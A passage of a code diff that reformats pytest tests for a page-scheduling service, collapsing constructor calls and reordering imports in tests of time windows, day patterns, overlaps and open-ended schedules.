     def test_validate_end_after_start_allows_midnight_rollover(self):
         """Test that end_time before start_time is valid (midnight rollover)."""
-        entry = ScheduleEntry(
-            page_id="page-123",
-            start_time="17:00",
-            end_time="09:00",
-            day_pattern="all",
-            enabled=True
-        )
+        entry = ScheduleEntry(page_id="page-123", start_time="17:00", end_time="09:00", day_pattern="all", enabled=True)
         errors = entry.validate_config()
         assert len(errors) == 0, f"Midnight rollover should be valid, got: {errors}"
-    
+
     def test_validate_same_start_end_invalid(self):
         """Test validation rejects zero-duration schedule (same start and end)."""
-        entry = ScheduleEntry(
-            page_id="page-123",
-            start_time="12:00",
-            end_time="12:00",
-            day_pattern="all",
-            enabled=True
-        )
+        entry = ScheduleEntry(page_id="page-123", start_time="12:00", end_time="12:00", day_pattern="all", enabled=True)
         errors = entry.validate_config()
         assert len(errors) > 0
         assert any("end_time" in err.lower() for err in errors)
-    
+
     def test_validate_custom_days_required(self):
         """Test validation requires custom_days when pattern is custom."""
         entry = ScheduleEntry(
@@ -175,26 +129,21 @@ class TestScheduleEntry:
             end_time="17:00",
             day_pattern="custom",
             custom_days=None,
-            enabled=True
+            enabled=True,
         )
         errors = entry.validate_config()
         assert len(errors) > 0
         assert any("custom_days" in err.lower() for err in errors)
-    
+
     def test_validate_custom_days_not_empty(self):
         """Test validation requires at least one custom day."""
         entry = ScheduleEntry(
-            page_id="page-123",
-            start_time="09:00",
-            end_time="17:00",
-            day_pattern="custom",
-            custom_days=[],
-            enabled=True
+            page_id="page-123", start_time="09:00", end_time="17:00", day_pattern="custom", custom_days=[], enabled=True
         )
         errors = entry.validate_config()
         assert len(errors) > 0
         assert any("at least one" in err.lower() or "must contain" in err.lower() for err in errors)
-    
+
     def test_validate_custom_days_valid_names(self):
         """Test validation checks day names are valid."""
         entry = ScheduleEntry(
@@ -203,84 +152,61 @@ class TestScheduleEntry:
             end_time="17:00",
             day_pattern="custom",
             custom_days=["monday", "invalid_day"],
-            enabled=True
+            enabled=True,
         )
         errors = entry.validate_config()
         assert len(errors) > 0
         assert any("invalid day" in err.lower() for err in errors)
-    
+
     def test_is_valid(self):
         """Test is_valid helper method."""
         valid_entry = ScheduleEntry(
-            page_id="page-123",
-            start_time="09:00",
-            end_time="17:00",
-            day_pattern="all",
-            enabled=True
+            page_id="page-123", start_time="09:00", end_time="17:00", day_pattern="all", enabled=True
         )
         assert valid_entry.is_valid() is True
-        
+
         # Midnight rollover is valid (not an error)
         rollover_entry = ScheduleEntry(
-            page_id="page-123",
-            start_time="17:00",
-            end_time="09:00",
-            day_pattern="all",
-            enabled=True
+            page_id="page-123", start_time="17:00", end_time="09:00", day_pattern="all", enabled=True
         )
         assert rollover_entry.is_valid() is True
-        
+
         # Zero-duration is invalid
         invalid_entry = ScheduleEntry(
-            page_id="page-123",
-            start_time="12:00",
-            end_time="12:00",
-            day_pattern="all",
-            enabled=True
+            page_id="page-123", start_time="12:00", end_time="12:00", day_pattern="all", enabled=True
         )
         assert invalid_entry.is_valid() is False
 
 
 class TestScheduleCreate:
     """Test ScheduleCreate model."""
-    
+
     def test_create_request(self):
         """Test creating a schedule create request."""
         create = ScheduleCreate(
-            page_id="page-123",
-            start_time="09:00",
-            end_time="17:00",
-            day_pattern="weekdays",
-            enabled=True
+            page_id="page-123", start_time="09:00", end_time="17:00", day_pattern="weekdays", enabled=True
         )
-        
+
         assert create.page_id == "page-123"
         assert create.start_time == "09:00"
         assert create.end_time == "17:00"
         assert create.day_pattern == "weekdays"
         assert create.enabled is True
-    
+
     def test_create_defaults_enabled_true(self):
         """Test that enabled defaults to True."""
-        create = ScheduleCreate(
-            page_id="page-123",
-            start_time="09:00",
-            end_time="17:00",
-            day_pattern="all"
-        )
-        
+        create = ScheduleCreate(page_id="page-123", start_time="09:00", end_time="17:00", day_pattern="all")
+
         assert create.enabled is True
 
 
 class TestScheduleUpdate:
     """Test ScheduleUpdate model."""
-    
+
     def test_update_request_partial(self):
         """Test that update request allows partial updates."""
-        update = ScheduleUpdate(
-            start_time="10:00"
-        )
-        
+        update = ScheduleUpdate(start_time="10:00")
+
         assert update.start_time == "10:00"
         assert update.end_time is None
         assert update.page_id is None
@@ -288,73 +214,47 @@ class TestScheduleUpdate:
 
 class TestValidationModels:
     """Test validation result models."""
-    
+
     def test_overlap(self):
         """Test Overlap model."""
         overlap = Overlap(
-            schedule1_id="sched-1",
-            schedule2_id="sched-2",
-            conflict_description="Both active Monday 9:00-10:00"
+            schedule1_id="sched-1", schedule2_id="sched-2", conflict_description="Both active Monday 9:00-10:00"
         )
-        
+
         assert overlap.schedule1_id == "sched-1"
         assert overlap.schedule2_id == "sched-2"
         assert "Monday" in overlap.conflict_description
-    
+
     def test_gap(self):
         """Test Gap model."""
-        gap = Gap(
-            start_time="12:00",
-            end_time="13:00",
-            days=["monday", "tuesday"]
-        )
-        
+        gap = Gap(start_time="12:00", end_time="13:00", days=["monday", "tuesday"])
+
         assert gap.start_time == "12:00"
         assert gap.end_time == "13:00"
         assert "monday" in gap.days
-    
+
     def test_validation_result_valid(self):
         """Test validation result when valid."""
-        result = ScheduleValidationResult(
-            valid=True,
-            overlaps=[],
-            gaps=[]
-        )
-        
+        result = ScheduleValidationResult(valid=True, overlaps=[], gaps=[])
+
         assert result.valid is True
         assert len(result.overlaps) == 0
         assert len(result.gaps) == 0
-    
+
     def test_validation_result_with_overlaps(self):
         """Test validation result with overlaps."""
-        overlap = Overlap(
-            schedule1_id="sched-1",
-            schedule2_id="sched-2",
-            conflict_description="Conflict"
-        )
-        
-        result = ScheduleValidationResult(
-            valid=False,
-            overlaps=[overlap],
-            gaps=[]
-        )
-        
+        overlap = Overlap(schedule1_id="sched-1", schedule2_id="sched-2", conflict_description="Conflict")
+
+        result = ScheduleValidationResult(valid=False, overlaps=[overlap], gaps=[])
+
         assert result.valid is False
         assert len(result.overlaps) == 1
-    
+
     def test_validation_result_with_gaps(self):
         """Test validation result with gaps."""
-        gap = Gap(
-            start_time="12:00",
-            end_time="13:00",
-            days=["monday"]
-        )
-        
-        result = ScheduleValidationResult(
-            valid=True,
-            overlaps=[],
-            gaps=[gap]
-        )
-        
+        gap = Gap(start_time="12:00", end_time="13:00", days=["monday"])
+
+        result = ScheduleValidationResult(valid=True, overlaps=[], gaps=[gap])
+
         assert result.valid is True
         assert len(result.gaps) == 1

--- a/tests/test_schedules_optional_end_time.py
+++ b/tests/test_schedules_optional_end_time.py
@@ -8,21 +8,22 @@ These tests verify that:
 5. Active page resolution handles optional end_time correctly
 """
 
-import pytest
 import tempfile
-from pathlib import Path
 from datetime import time
+from pathlib import Path
 
-from src.schedules.models import ScheduleEntry, ScheduleCreate
+import pytest
+
+from src.carousels.models import Carousel
+from src.schedules.models import ScheduleCreate, ScheduleEntry
 from src.schedules.service import ScheduleService
 from src.schedules.storage import ScheduleStorage
-from src.carousels.models import Carousel
 
 
 @pytest.fixture
 def temp_storage_file():
     """Create a temporary storage file."""
-    with tempfile.NamedTemporaryFile(mode='w', delete=False, suffix='.json') as f:
+    with tempfile.NamedTemporaryFile(mode="w", delete=False, suffix=".json") as f:
         temp_path = f.name
     yield temp_path
     Path(temp_path).unlink(missing_ok=True)
@@ -46,11 +47,7 @@ class TestOneMinuteGranularity:
     def test_schedule_with_arbitrary_minutes_validates(self):
         """Schedule using 07:35-07:40 should now be valid."""
         entry = ScheduleEntry(
-            page_id="page-123",
-            start_time="07:35",
-            end_time="07:40",
-            day_pattern="weekdays",
-            enabled=True
+            page_id="page-123", start_time="07:35", end_time="07:40", day_pattern="weekdays", enabled=True
         )
         errors = entry.validate_config()
         assert len(errors) == 0, f"Expected no errors but got: {errors}"
@@ -64,32 +61,20 @@ class TestOneMinuteGranularity:
                 start_time=f"07:{minute_str}",
                 end_time=f"08:{minute_str}",
                 day_pattern="all",
-                enabled=True
+                enabled=True,
             )
             errors = entry.validate_config()
             assert len(errors) == 0, f"Minute {minute_str} should be valid but got: {errors}"
 
     def test_schedule_with_5_minute_start(self):
         """Schedule with 09:05 start should be valid."""
-        entry = ScheduleEntry(
-            page_id="page-123",
-            start_time="09:05",
-            end_time="17:00",
-            day_pattern="all",
-            enabled=True
-        )
+        entry = ScheduleEntry(page_id="page-123", start_time="09:05", end_time="17:00", day_pattern="all", enabled=True)
         errors = entry.validate_config()
         assert len(errors) == 0
 
     def test_schedule_with_single_minute_duration(self):
         """Schedule 07:35-07:36 (1 minute) should be valid."""
-        entry = ScheduleEntry(
-            page_id="page-123",
-            start_time="07:35",
-            end_time="07:36",
-            day_pattern="all",
-            enabled=True
-        )
+        entry = ScheduleEntry(page_id="page-123", start_time="07:35", end_time="07:36", day_pattern="all", enabled=True)
         errors = entry.validate_config()
         assert len(errors) == 0
 
@@ -105,7 +90,7 @@ class TestOneMinuteGranularity:
                 start_time=f"07:{minute:02d}",
                 end_time=f"07:{next_minute:02d}",
                 day_pattern="weekdays",
-                enabled=True
+                enabled=True,
             )
             service.create_schedule(create_data)
 
@@ -126,13 +111,7 @@ class TestOneMinuteGranularity:
 
     def test_15_minute_intervals_still_valid(self):
         """15-minute interval schedules should still work after removal of constraint."""
-        entry = ScheduleEntry(
-            page_id="page-123",
-            start_time="09:00",
-            end_time="17:00",
-            day_pattern="all",
-            enabled=True
-        )
+        entry = ScheduleEntry(page_id="page-123", start_time="09:00", end_time="17:00", day_pattern="all", enabled=True)
         errors = entry.validate_config()
         assert len(errors) == 0
 
@@ -148,11 +127,7 @@ class TestOptionalEndTime:
     def test_schedule_entry_allows_none_end_time(self):
         """ScheduleEntry should accept end_time=None."""
         entry = ScheduleEntry(
-            page_id="carousel:abc-123",
-            start_time="07:35",
-            end_time=None,
-            day_pattern="weekdays",
-            enabled=True
+            page_id="carousel:abc-123", start_time="07:35", end_time=None, day_pattern="weekdays", enabled=True
         )
         assert entry.end_time is None
         assert entry.start_time == "07:35"
@@ -160,22 +135,14 @@ class TestOptionalEndTime:
     def test_schedule_create_allows_none_end_time(self):
         """ScheduleCreate should accept end_time=None."""
         create = ScheduleCreate(
-            page_id="carousel:abc-123",
-            start_time="07:35",
-            end_time=None,
-            day_pattern="weekdays",
-            enabled=True
+            page_id="carousel:abc-123", start_time="07:35", end_time=None, day_pattern="weekdays", enabled=True
         )
         assert create.end_time is None
 
     def test_none_end_time_validates_ok(self):
         """Schedule with None end_time should validate successfully."""
         entry = ScheduleEntry(
-            page_id="carousel:abc-123",
-            start_time="07:35",
-            end_time=None,
-            day_pattern="weekdays",
-            enabled=True
+            page_id="carousel:abc-123", start_time="07:35", end_time=None, day_pattern="weekdays", enabled=True
         )
         errors = entry.validate_config()
         assert len(errors) == 0, f"Expected no errors but got: {errors}"
@@ -183,11 +150,7 @@ class TestOptionalEndTime:
     def test_none_end_time_same_start_not_rejected(self):
         """Zero-duration check should not trigger when end_time is None."""
         entry = ScheduleEntry(
-            page_id="carousel:abc-123",
-            start_time="07:35",
-            end_time=None,
-            day_pattern="all",
-            enabled=True
+            page_id="carousel:abc-123", start_time="07:35", end_time=None, day_pattern="all", enabled=True
         )
         errors = entry.validate_config()
         assert not any("zero-duration" in e.lower() for e in errors)
@@ -196,11 +159,7 @@ class TestOptionalEndTime:
     def test_schedule_with_none_end_time_is_valid(self):
         """is_valid() should return True for schedule with None end_time."""
         entry = ScheduleEntry(
-            page_id="carousel:abc-123",
-            start_time="07:35",
-            end_time=None,
-            day_pattern="all",
-            enabled=True
+            page_id="carousel:abc-123", start_time="07:35", end_time=None, day_pattern="all", enabled=True
         )
         assert entry.is_valid() is True
 
@@ -251,22 +210,14 @@ class TestAppliesToTimeOptionalEnd:
     def test_applies_to_time_at_start(self):
         """Time at start_time should match open-ended schedule."""
         entry = ScheduleEntry(
-            page_id="carousel:abc",
-            start_time="07:35",
-            end_time=None,
-            day_pattern="all",
-            enabled=True
+            page_id="carousel:abc", start_time="07:35", end_time=None, day_pattern="all", enabled=True
         )
         assert entry.applies_to_time("07:35") is True
 
     def test_applies_to_time_after_start(self):
         """Time after start_time should match open-ended schedule (no end boundary)."""
         entry = ScheduleEntry(
-            page_id="carousel:abc",
-            start_time="07:35",
-            end_time=None,
-            day_pattern="all",
-            enabled=True
+            page_id="carousel:abc", start_time="07:35", end_time=None, day_pattern="all", enabled=True
         )
         # Open-ended: matches from start_time until end of day
         assert entry.applies_to_time("07:40") is True
@@ -276,11 +227,7 @@ class TestAppliesToTimeOptionalEnd:
     def test_applies_to_time_before_start(self):
         """Time before start_time should NOT match open-ended schedule."""
         entry = ScheduleEntry(
-            page_id="carousel:abc",
-            start_time="07:35",
-            end_time=None,
-            day_pattern="all",
-            enabled=True
+            page_id="carousel:abc", start_time="07:35", end_time=None, day_pattern="all", enabled=True
         )
         assert entry.applies_to_time("07:34") is False
         assert entry.applies_to_time("00:00") is False
@@ -297,11 +244,7 @@ class TestStorageOptionalEndTime:
     def test_create_schedule_with_none_end_time(self, service):
         """Creating a schedule with None end_time should persist correctly."""
         create_data = ScheduleCreate(
-            page_id="carousel:abc-123",
-            start_time="07:35",
-            end_time=None,
-            day_pattern="weekdays",
-            enabled=True
+            page_id="carousel:abc-123", start_time="07:35", end_time=None, day_pattern="weekdays", enabled=True
         )
         created = service.create_schedule(create_data)
         assert created.end_time is None
@@ -315,18 +258,15 @@ class TestStorageOptionalEndTime:
     def test_update_schedule_to_none_end_time(self, service):
         """Updating a schedule to have None end_time should work."""
         create_data = ScheduleCreate(
-            page_id="carousel:abc-123",
-            start_time="07:35",
-            end_time="08:00",
-            day_pattern="weekdays",
-            enabled=True
+            page_id="carousel:abc-123", start_time="07:35", end_time="08:00", day_pattern="weekdays", enabled=True
         )
         created = service.create_schedule(create_data)
         assert created.end_time == "08:00"
 
         from src.schedules.models import ScheduleUpdate
+
         update_data = ScheduleUpdate(end_time=None)
-        # Note: With model_dump(exclude_unset=True), setting None explicitly 
+        # Note: With model_dump(exclude_unset=True), setting None explicitly
         # should be allowed for end_time
         updated = service.update_schedule(created.id, update_data)
         # After update, end_time should be cleared
@@ -343,20 +283,14 @@ class TestOverlapWithOptionalEndTime:
 
     def test_open_ended_overlaps_with_later_schedule(self, service):
         """An open-ended schedule should overlap with a schedule that starts after it."""
-        service.create_schedule(ScheduleCreate(
-            page_id="carousel:abc",
-            start_time="07:35",
-            end_time=None,
-            day_pattern="all",
-            enabled=True
-        ))
-        service.create_schedule(ScheduleCreate(
-            page_id="page-afternoon",
-            start_time="12:00",
-            end_time="17:00",
-            day_pattern="all",
-            enabled=True
-        ))
+        service.create_schedule(
+            ScheduleCreate(page_id="carousel:abc", start_time="07:35", end_time=None, day_pattern="all", enabled=True)
+        )
+        service.create_schedule(
+            ScheduleCreate(
+                page_id="page-afternoon", start_time="12:00", end_time="17:00", day_pattern="all", enabled=True
+            )
+        )
 
         result = service.validate_schedules()
         assert result.valid is False
@@ -364,20 +298,16 @@ class TestOverlapWithOptionalEndTime:
 
     def test_open_ended_does_not_overlap_different_days(self, service):
         """Open-ended schedule on weekdays should not overlap with weekend schedule."""
-        service.create_schedule(ScheduleCreate(
-            page_id="carousel:abc",
-            start_time="07:35",
-            end_time=None,
-            day_pattern="weekdays",
-            enabled=True
-        ))
-        service.create_schedule(ScheduleCreate(
-            page_id="page-weekend",
-            start_time="09:00",
-            end_time="17:00",
-            day_pattern="weekends",
-            enabled=True
-        ))
+        service.create_schedule(
+            ScheduleCreate(
+                page_id="carousel:abc", start_time="07:35", end_time=None, day_pattern="weekdays", enabled=True
+            )
+        )
+        service.create_schedule(
+            ScheduleCreate(
+                page_id="page-weekend", start_time="09:00", end_time="17:00", day_pattern="weekends", enabled=True
+            )
+        )
 
         result = service.validate_schedules()
         assert result.valid is True
@@ -394,39 +324,27 @@ class TestActivePageWithOptionalEndTime:
 
     def test_open_ended_matches_at_start(self, service):
         """Open-ended schedule should match at its start time."""
-        service.create_schedule(ScheduleCreate(
-            page_id="carousel:abc",
-            start_time="07:35",
-            end_time=None,
-            day_pattern="all",
-            enabled=True
-        ))
+        service.create_schedule(
+            ScheduleCreate(page_id="carousel:abc", start_time="07:35", end_time=None, day_pattern="all", enabled=True)
+        )
 
         page_id = service.get_active_page_id(time(7, 35), "monday")
         assert page_id == "carousel:abc"
 
     def test_open_ended_matches_after_start(self, service):
         """Open-ended schedule should match after start time."""
-        service.create_schedule(ScheduleCreate(
-            page_id="carousel:abc",
-            start_time="07:35",
-            end_time=None,
-            day_pattern="all",
-            enabled=True
-        ))
+        service.create_schedule(
+            ScheduleCreate(page_id="carousel:abc", start_time="07:35", end_time=None, day_pattern="all", enabled=True)
+        )
 
         page_id = service.get_active_page_id(time(12, 0), "monday")
         assert page_id == "carousel:abc"
 
     def test_open_ended_does_not_match_before_start(self, service):
         """Open-ended schedule should not match before start time."""
-        service.create_schedule(ScheduleCreate(
-            page_id="carousel:abc",
-            start_time="07:35",
-            end_time=None,
-            day_pattern="all",
-            enabled=True
-        ))
+        service.create_schedule(
+            ScheduleCreate(page_id="carousel:abc", start_time="07:35", end_time=None, day_pattern="all", enabled=True)
+        )
 
         service.set_default_page("default-page")
         page_id = service.get_active_page_id(time(7, 34), "monday")

--- a/tests/test_schedules_service.py
+++ b/tests/test_schedules_service.py
@@ -1,10 +1,11 @@
 """Tests for schedule service."""
 
-import pytest
 import tempfile
+from datetime import time
 from pathlib import Path
 from unittest.mock import MagicMock
-from datetime import time
+
+import pytest
 
 from src.schedules.models import ScheduleCreate
 from src.schedules.service import ScheduleService
@@ -14,7 +15,7 @@ from src.schedules.storage import ScheduleStorage
 @pytest.fixture
 def temp_storage_file():
     """Create a temporary storage file."""
-    with tempfile.NamedTemporaryFile(mode='w', delete=False, suffix='.json') as f:
+    with tempfile.NamedTemporaryFile(mode="w", delete=False, suffix=".json") as f:
         temp_path = f.name
     yield temp_path
     Path(temp_path).unlink(missing_ok=True)
@@ -29,15 +30,13 @@ def service(temp_storage_file):
 
 class TestScheduleServiceCRUD:
     """Test CRUD operations."""
-    
+
     def test_list_schedules_empty(self, service):
         """Test listing schedules when empty."""
         schedules = service.list_schedules()
         assert len(schedules) == 0
 
-    def test_list_schedules_by_first_board_id_includes_legacy_default_board(
-        self, service, monkeypatch
-    ):
+    def test_list_schedules_by_first_board_id_includes_legacy_default_board(self, service, monkeypatch):
         """Schedules with board_id '' must show when UI filters by first board id."""
         create_data = ScheduleCreate(
             page_id="page-legacy",
@@ -68,106 +67,84 @@ class TestScheduleServiceCRUD:
     def test_create_schedule(self, service):
         """Test creating a schedule."""
         create_data = ScheduleCreate(
-            page_id="page-123",
-            start_time="09:00",
-            end_time="17:00",
-            day_pattern="weekdays",
-            enabled=True
+            page_id="page-123", start_time="09:00", end_time="17:00", day_pattern="weekdays", enabled=True
         )
-        
+
         created = service.create_schedule(create_data)
-        
+
         assert created.page_id == "page-123"
         assert created.start_time == "09:00"
         assert created.end_time == "17:00"
         assert created.id is not None
-    
+
     def test_get_schedule(self, service):
         """Test getting a schedule by ID."""
         create_data = ScheduleCreate(
-            page_id="page-123",
-            start_time="09:00",
-            end_time="17:00",
-            day_pattern="all",
-            enabled=True
+            page_id="page-123", start_time="09:00", end_time="17:00", day_pattern="all", enabled=True
         )
         created = service.create_schedule(create_data)
-        
+
         retrieved = service.get_schedule(created.id)
         assert retrieved is not None
         assert retrieved.id == created.id
-    
+
     def test_update_schedule(self, service):
         """Test updating a schedule."""
         create_data = ScheduleCreate(
-            page_id="page-123",
-            start_time="09:00",
-            end_time="17:00",
-            day_pattern="all",
-            enabled=True
+            page_id="page-123", start_time="09:00", end_time="17:00", day_pattern="all", enabled=True
         )
         created = service.create_schedule(create_data)
-        
+
         from src.schedules.models import ScheduleUpdate
-        update_data = ScheduleUpdate(
-            start_time="10:00",
-            enabled=False
-        )
-        
+
+        update_data = ScheduleUpdate(start_time="10:00", enabled=False)
+
         updated = service.update_schedule(created.id, update_data)
         assert updated is not None
         assert updated.start_time == "10:00"
         assert updated.enabled is False
-    
+
     def test_delete_schedule(self, service):
         """Test deleting a schedule."""
         create_data = ScheduleCreate(
-            page_id="page-123",
-            start_time="09:00",
-            end_time="17:00",
-            day_pattern="all",
-            enabled=True
+            page_id="page-123", start_time="09:00", end_time="17:00", day_pattern="all", enabled=True
         )
         created = service.create_schedule(create_data)
-        
+
         result = service.delete_schedule(created.id)
         assert result is True
-        
+
         assert service.get_schedule(created.id) is None
 
 
 class TestActivePageResolution:
     """Test active page resolution logic."""
-    
+
     def test_get_active_page_id_no_schedules(self, service):
         """Test active page when no schedules exist."""
         # Monday 09:00
         page_id = service.get_active_page_id(time(9, 0), "monday")
         assert page_id is None
-    
+
     def test_get_active_page_id_with_default(self, service):
         """Test active page falls back to default when no match."""
         service.set_default_page("default-page")
-        
+
         # No schedules, should return default
         page_id = service.get_active_page_id(time(9, 0), "monday")
         assert page_id == "default-page"
-    
+
     def test_get_active_page_id_matches_schedule(self, service):
         """Test active page when schedule matches."""
         create_data = ScheduleCreate(
-            page_id="work-page",
-            start_time="09:00",
-            end_time="17:00",
-            day_pattern="weekdays",
-            enabled=True
+            page_id="work-page", start_time="09:00", end_time="17:00", day_pattern="weekdays", enabled=True
         )
         service.create_schedule(create_data)
-        
+
         # Monday 12:00 - should match weekdays schedule
         page_id = service.get_active_page_id(time(12, 0), "monday")
         assert page_id == "work-page"
-    
+
     def test_get_active_page_id_disabled_schedule_ignored(self, service):
         """Test that disabled schedules are ignored."""
         create_data = ScheduleCreate(
@@ -175,124 +152,100 @@ class TestActivePageResolution:
             start_time="09:00",
             end_time="17:00",
             day_pattern="all",
-            enabled=False  # Disabled
+            enabled=False,  # Disabled
         )
         service.create_schedule(create_data)
-        
+
         service.set_default_page("default-page")
-        
+
         # Should use default, not disabled schedule
         page_id = service.get_active_page_id(time(12, 0), "monday")
         assert page_id == "default-page"
-    
+
     def test_get_active_page_id_before_schedule(self, service):
         """Test active page before schedule starts."""
         create_data = ScheduleCreate(
-            page_id="work-page",
-            start_time="09:00",
-            end_time="17:00",
-            day_pattern="all",
-            enabled=True
+            page_id="work-page", start_time="09:00", end_time="17:00", day_pattern="all", enabled=True
         )
         service.create_schedule(create_data)
-        
+
         service.set_default_page("default-page")
-        
+
         # 06:00 - before schedule
         page_id = service.get_active_page_id(time(6, 0), "monday")
         assert page_id == "default-page"
-    
+
     def test_get_active_page_id_after_schedule(self, service):
         """Test active page after schedule ends."""
         create_data = ScheduleCreate(
-            page_id="work-page",
-            start_time="09:00",
-            end_time="17:00",
-            day_pattern="all",
-            enabled=True
+            page_id="work-page", start_time="09:00", end_time="17:00", day_pattern="all", enabled=True
         )
         service.create_schedule(create_data)
-        
+
         service.set_default_page("default-page")
-        
+
         # 18:00 - after schedule (17:00 is exclusive)
         page_id = service.get_active_page_id(time(18, 0), "monday")
         assert page_id == "default-page"
-    
+
     def test_get_active_page_id_at_exact_start_time(self, service):
         """Test active page at exact start time (inclusive)."""
         create_data = ScheduleCreate(
-            page_id="work-page",
-            start_time="09:00",
-            end_time="17:00",
-            day_pattern="all",
-            enabled=True
+            page_id="work-page", start_time="09:00", end_time="17:00", day_pattern="all", enabled=True
         )
         service.create_schedule(create_data)
-        
+
         # 09:00 - exact start (inclusive)
         page_id = service.get_active_page_id(time(9, 0), "monday")
         assert page_id == "work-page"
-    
+
     def test_get_active_page_id_at_exact_end_time(self, service):
         """Test active page at exact end time (exclusive)."""
         create_data = ScheduleCreate(
-            page_id="work-page",
-            start_time="09:00",
-            end_time="17:00",
-            day_pattern="all",
-            enabled=True
+            page_id="work-page", start_time="09:00", end_time="17:00", day_pattern="all", enabled=True
         )
         service.create_schedule(create_data)
-        
+
         service.set_default_page("default-page")
-        
+
         # 17:00 - exact end (exclusive)
         page_id = service.get_active_page_id(time(17, 0), "monday")
         assert page_id == "default-page"
-    
+
     def test_get_active_page_id_weekdays_only(self, service):
         """Test schedule applies only to weekdays."""
         create_data = ScheduleCreate(
-            page_id="work-page",
-            start_time="09:00",
-            end_time="17:00",
-            day_pattern="weekdays",
-            enabled=True
+            page_id="work-page", start_time="09:00", end_time="17:00", day_pattern="weekdays", enabled=True
         )
         service.create_schedule(create_data)
-        
+
         service.set_default_page("default-page")
-        
+
         # Monday (weekday) - should match
         page_id = service.get_active_page_id(time(12, 0), "monday")
         assert page_id == "work-page"
-        
+
         # Saturday (weekend) - should not match
         page_id = service.get_active_page_id(time(12, 0), "saturday")
         assert page_id == "default-page"
-    
+
     def test_get_active_page_id_weekends_only(self, service):
         """Test schedule applies only to weekends."""
         create_data = ScheduleCreate(
-            page_id="leisure-page",
-            start_time="10:00",
-            end_time="18:00",
-            day_pattern="weekends",
-            enabled=True
+            page_id="leisure-page", start_time="10:00", end_time="18:00", day_pattern="weekends", enabled=True
         )
         service.create_schedule(create_data)
-        
+
         service.set_default_page("default-page")
-        
+
         # Saturday (weekend) - should match
         page_id = service.get_active_page_id(time(12, 0), "saturday")
         assert page_id == "leisure-page"
-        
+
         # Monday (weekday) - should not match
         page_id = service.get_active_page_id(time(12, 0), "monday")
         assert page_id == "default-page"
-    
+
     def test_get_active_page_id_custom_days(self, service):
         """Test schedule with custom days."""
         create_data = ScheduleCreate(
@@ -301,20 +254,20 @@ class TestActivePageResolution:
             end_time="17:00",
             day_pattern="custom",
             custom_days=["monday", "wednesday", "friday"],
-            enabled=True
+            enabled=True,
         )
         service.create_schedule(create_data)
-        
+
         service.set_default_page("default-page")
-        
+
         # Monday - should match
         page_id = service.get_active_page_id(time(12, 0), "monday")
         assert page_id == "custom-page"
-        
+
         # Tuesday - should not match
         page_id = service.get_active_page_id(time(12, 0), "tuesday")
         assert page_id == "default-page"
-        
+
         # Wednesday - should match
         page_id = service.get_active_page_id(time(12, 0), "wednesday")
         assert page_id == "custom-page"
@@ -322,149 +275,129 @@ class TestActivePageResolution:
 
 class TestValidation:
     """Test schedule validation."""
-    
+
     def test_validate_schedules_no_overlaps(self, service):
         """Test validation with no overlaps."""
         # Create non-overlapping schedules
-        service.create_schedule(ScheduleCreate(
-            page_id="morning-page",
-            start_time="06:00",
-            end_time="12:00",
-            day_pattern="all",
-            enabled=True
-        ))
-        
-        service.create_schedule(ScheduleCreate(
-            page_id="afternoon-page",
-            start_time="12:00",
-            end_time="18:00",
-            day_pattern="all",
-            enabled=True
-        ))
-        
+        service.create_schedule(
+            ScheduleCreate(
+                page_id="morning-page", start_time="06:00", end_time="12:00", day_pattern="all", enabled=True
+            )
+        )
+
+        service.create_schedule(
+            ScheduleCreate(
+                page_id="afternoon-page", start_time="12:00", end_time="18:00", day_pattern="all", enabled=True
+            )
+        )
+
         result = service.validate_schedules()
         assert result.valid is True
         assert len(result.overlaps) == 0
-    
+
     def test_validate_schedules_with_time_overlap(self, service):
         """Test validation detects time overlaps."""
         # Create overlapping schedules (same day pattern, overlapping times)
-        service.create_schedule(ScheduleCreate(
-            page_id="page-1",
-            start_time="09:00",
-            end_time="17:00",
-            day_pattern="all",
-            enabled=True
-        ))
-        
-        service.create_schedule(ScheduleCreate(
-            page_id="page-2",
-            start_time="15:00",  # Overlaps with previous
-            end_time="20:00",
-            day_pattern="all",
-            enabled=True
-        ))
-        
+        service.create_schedule(
+            ScheduleCreate(page_id="page-1", start_time="09:00", end_time="17:00", day_pattern="all", enabled=True)
+        )
+
+        service.create_schedule(
+            ScheduleCreate(
+                page_id="page-2",
+                start_time="15:00",  # Overlaps with previous
+                end_time="20:00",
+                day_pattern="all",
+                enabled=True,
+            )
+        )
+
         result = service.validate_schedules()
         assert result.valid is False
         assert len(result.overlaps) > 0
-    
+
     def test_validate_schedules_different_days_no_overlap(self, service):
         """Test schedules on different days don't overlap."""
         # Same times but different days
-        service.create_schedule(ScheduleCreate(
-            page_id="weekday-page",
-            start_time="09:00",
-            end_time="17:00",
-            day_pattern="weekdays",
-            enabled=True
-        ))
-        
-        service.create_schedule(ScheduleCreate(
-            page_id="weekend-page",
-            start_time="09:00",
-            end_time="17:00",
-            day_pattern="weekends",
-            enabled=True
-        ))
-        
+        service.create_schedule(
+            ScheduleCreate(
+                page_id="weekday-page", start_time="09:00", end_time="17:00", day_pattern="weekdays", enabled=True
+            )
+        )
+
+        service.create_schedule(
+            ScheduleCreate(
+                page_id="weekend-page", start_time="09:00", end_time="17:00", day_pattern="weekends", enabled=True
+            )
+        )
+
         result = service.validate_schedules()
         assert result.valid is True
         assert len(result.overlaps) == 0
-    
+
     def test_validate_schedules_partial_day_overlap(self, service):
         """Test overlaps when days partially overlap."""
         # "all" includes weekdays, so these overlap on weekdays
-        service.create_schedule(ScheduleCreate(
-            page_id="weekday-page",
-            start_time="09:00",
-            end_time="17:00",
-            day_pattern="weekdays",
-            enabled=True
-        ))
-        
-        service.create_schedule(ScheduleCreate(
-            page_id="all-page",
-            start_time="09:00",
-            end_time="17:00",
-            day_pattern="all",
-            enabled=True
-        ))
-        
+        service.create_schedule(
+            ScheduleCreate(
+                page_id="weekday-page", start_time="09:00", end_time="17:00", day_pattern="weekdays", enabled=True
+            )
+        )
+
+        service.create_schedule(
+            ScheduleCreate(page_id="all-page", start_time="09:00", end_time="17:00", day_pattern="all", enabled=True)
+        )
+
         result = service.validate_schedules()
         assert result.valid is False
         assert len(result.overlaps) > 0
-    
+
     def test_validate_schedules_ignores_disabled(self, service):
         """Test validation ignores disabled schedules."""
-        service.create_schedule(ScheduleCreate(
-            page_id="page-1",
-            start_time="09:00",
-            end_time="17:00",
-            day_pattern="all",
-            enabled=True
-        ))
-        
-        service.create_schedule(ScheduleCreate(
-            page_id="page-2",
-            start_time="15:00",
-            end_time="20:00",
-            day_pattern="all",
-            enabled=False  # Disabled - should be ignored
-        ))
-        
+        service.create_schedule(
+            ScheduleCreate(page_id="page-1", start_time="09:00", end_time="17:00", day_pattern="all", enabled=True)
+        )
+
